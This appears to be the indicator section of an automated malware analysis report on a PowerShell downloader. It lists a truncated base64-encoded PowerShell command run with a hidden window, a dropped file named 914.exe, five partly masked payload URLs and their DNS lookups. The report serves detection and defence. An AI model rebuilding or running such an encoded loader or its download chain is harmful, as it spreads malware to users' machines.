Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABnAGUAdQBqAGQAdQB5AHMAbwBhAGQAPQAnAGIAZQBsAHQAaABhAHUAZAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYwB1AHIASQBgAFQAYAB5AHAAUgBPAGAAVABgAE8AQwBPAG...
- %HOMEPATH%\914.exe
- %HOMEPATH%\914.exe
- %HOMEPATH%\914.exe
- http://gi#####hanksdaily.com/cgi-bin/jHU/
- http://gr####tegames.com/Downloads/QP/
- http://gr###eshack.net/wp-includes/J9k/
- http://ha###elten.com/_test/zJikECHQ/
- http://fo###erious.com/BRAVADO_1401_1402/sadN3/
- DNS ASK gi#####hanksdaily.com
- DNS ASK gr####tegames.com
- DNS ASK gr###eshack.net
- DNS ASK ha###elten.com
- DNS ASK fo###erious.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABnAGUAdQBqAGQAdQB5AHMAbwBhAGQAPQAnAGIAZQBsAHQAaABhAHUAZAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYwB1AHIASQBgAFQAYAB5AHAAUgBPAGAAVABgAE8AQwBPAG...' (with hidden window)